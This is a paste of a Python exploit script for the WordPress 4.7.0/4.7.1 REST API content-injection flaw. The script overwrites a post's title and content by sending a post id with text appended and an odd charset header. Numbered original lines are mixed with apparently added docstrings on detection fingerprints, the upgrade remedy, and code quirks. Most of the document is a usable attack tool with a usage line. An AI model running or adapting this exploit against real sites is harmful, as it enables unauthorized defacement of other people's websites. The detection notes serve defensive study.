_c0mrad

[Expl] WPContInjection.py

Feb 2nd, 2017
  1. """
  2. Wordpress Content Injection Exploit | 4.7.0 & 4.7.1
  3. Usage: wp-content-injection.py --url http://127.0.0.1/wordpress/index.php/wp-json/wp/v2/posts/6 --title "rekt" --content "rip"
  4. Options:
  5. -h, --help show this help message and exit
  6. -u URL, --url=URL Specify the URL
  7. -t TITLE, --title=TITLE Specify the Page Title
  8. -c CONTENT, --content=CONTENT Specify the Page Content
  9. """
  10. # Exploit Title: WP Content Injection Exploit
  11. # Date: 02-02-2017
  12. # Author: GasGeverij
  13. # Version: Wordpress 4.7.0 & 4.7.1
  14. # by: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
  15. import json
  16. import requests
  17. import optparse
  18. import sys
  19. from urlparse import urlparse
  20. import time
# Path this script was invoked with (argv[0]); main() splices it into the usage text.
script = sys.argv[0]
def getPid(url):
    """Return the path segment that follows 'posts' in *url*.

    The URL is split on '/' and the element right after the first segment
    equal to 'posts' is returned unchanged, as a string. For the usage example
    in the file header (.../wp-json/wp/v2/posts/6) the result is '6'.

    Nothing checks that the segment is numeric. list.index raises ValueError
    when no segment equals 'posts', and the lookup raises IndexError when
    'posts' is the last segment.
    """
    segments = url.split('/')
    return segments[segments.index('posts') + 1]
  26.  
def getDomain(url):
    """Return 'scheme://netloc/' for *url*; path, query and fragment are dropped."""
    pieces = urlparse(url)
    return '{uri.scheme}://{uri.netloc}/'.format(uri=pieces)
  31.  
def banner():
    """Return the multi-line ASCII-art banner that main() prints.

    The text is purely cosmetic. It is kept as an ordinary (non-raw) string
    literal; none of its backslash sequences is a recognised escape, so each
    backslash is emitted literally.
    """
    art = """
********************************************************
* _    _______      ______ _____ _____ _____    _____  *
*| |  | | ___ \    | ___ \ _  /  ___|_   _|  |_   _| *
*| |  | | |_/ /_____| |_/ / | | \ `--.  | |______| |   *
*| |/\| |  __/______|  __/| | | |`--. \ | |______| |   *
*\ /\ / |         | |   \ \_/ /\__/ / | |     _| |_  *
* \/  \/\_|         \_|    \___/\____/  \_/     \___/  *
*                                                      *
********************************************************
Cringe.
"""
    return art
  45.  
def main():
    """Parse -u/-t/-c, send one JSON POST to the given URL and print the outcome.

    What the request looks like on the wire, for anyone writing detections:
      * a POST to the --url value, which the usage text shows as a
        .../wp-json/wp/v2/posts/<id> REST route; this code attaches no
        credentials or cookies;
      * a JSON body whose "id" is the post id followed by the literal text
        "textappendshere", so it is not a plain integer;
      * a Content-Type of "application/json; charset=xxxe", where "xxxe" is
        not a standard charset name and therefore a fingerprint of this script.
    A non-integer id sent to that route is the more durable log/WAF signal,
    since the charset token is trivial to change.

    The file header scopes the issue to WordPress 4.7.0 and 4.7.1 and links
    the Sucuri advisory, so the version range implies the remedy: run a
    release later than 4.7.1.

    Only the HTTP status is inspected. A 200 is reported as success without
    re-reading the post, so neither message printed here proves whether the
    content actually changed.
    """
    usage = "Usage: "+script+" -u <URL> --title \"<PAGE_TITLE>\" --content \"<PAGE_CONTENT>\""
    cli = optparse.OptionParser(usage)
    cli.add_option("-u", "--url", dest="URL", type="string", help="Specify the URL")
    cli.add_option("-t", "--title", dest="TITLE", type="string", help="Specify the Page Title")
    cli.add_option("-c", "--content", dest="CONTENT", type="string", help="Specify the Page Content")
    options, _positional = cli.parse_args()
    url, title, content = options.URL, options.TITLE, options.CONTENT

    # An omitted option is None here; the string concatenations below (and
    # getPid on a None URL) then raise instead of sending anything.
    data = {
        "id": "" + str(getPid(url)) + "textappendshere",
        "title": "" + title + "",
        "content": "" + content + "",
    }
    headers = {
        'Content-Type': "application/json; charset=xxxe",
        'Accept': "application/json",
    }
    reply = requests.post(url, data=json.dumps(data), headers=headers)
    status = reply.status_code

    # Single-argument print(...) behaves the same under the Python 2 print
    # statement this file was written for.
    print(banner())
    print("Status Code: "+str(status))
    # time.sleep returns None, so this pauses two seconds and then prints "None".
    print(time.sleep(2))

    if str(status) != "200":
        print("May not be vulnerable?")
        return
    print("Yeyeye!")
    print("[+] Exploiting .. ")
    print("[+] check the post..")
    print("[+] "+getDomain(url)+"?p="+getPid(url))
if __name__ == '__main__':
    # Script entry point: run main() once.
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl-C: report it and leave with exit status 0.
        print("[-] Abort. User stopped the script.")
        sys.exit(0)
    except:
        # NOTE(review): this bare except discards every other exception from
        # main() without a message, so bad arguments and network failures end
        # the run silently.
        pass